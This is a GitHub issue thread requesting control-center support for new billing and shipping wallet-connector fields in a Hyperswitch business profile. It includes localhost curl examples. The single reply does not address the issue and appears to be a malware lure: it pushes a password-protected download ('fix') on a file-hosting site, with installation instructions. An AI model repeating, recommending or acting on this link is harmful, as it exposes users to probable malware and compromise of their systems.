### ISSUE TITLE
Add a boolean field in business profile to collect the address (billing and shipping) details from wallet connector

### ISSUE THREAD

**Issue by ShankarSinghC** [juspay/hyperswitch-control-center#1210]
The `collect_billing_details_from_wallet_connector` and `always_collect_billing_details_from_wallet_connector` are the two billing address related fields that has been added under that business profile.  This allows the merchant to specify whether to collect billing details from wallet connectors or form the customer. Need to add support in hyperswitch-control-center for the merchants to specify it.

```
curl --location 'http://localhost:8080/account/merchant_1724228538/business_profile/pro_d9hiUdWWy8n4bDCsRB1d' \
--header 'Content-Type: application/json' \
--header 'Accept: application/json' \
--header 'api-key: test_admin' \
--data '{
    "collect_billing_details_from_wallet_connector": false,
    "always_collect_billing_details_from_wallet_connector": true
}'
```

Same applies for shipping
```
curl --location 'http://localhost:8080/account/merchant_1724228538/business_profile/pro_d9hiUdWWy8n4bDCsRB1d' \
--header 'Content-Type: application/json' \
--header 'Accept: application/json' \
--header 'api-key: test_admin' \
--data '{
    "collect_shipping_details_from_wallet_connector": true,
    "always_collect_shipping_details_from_wallet_connector": true
}'
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
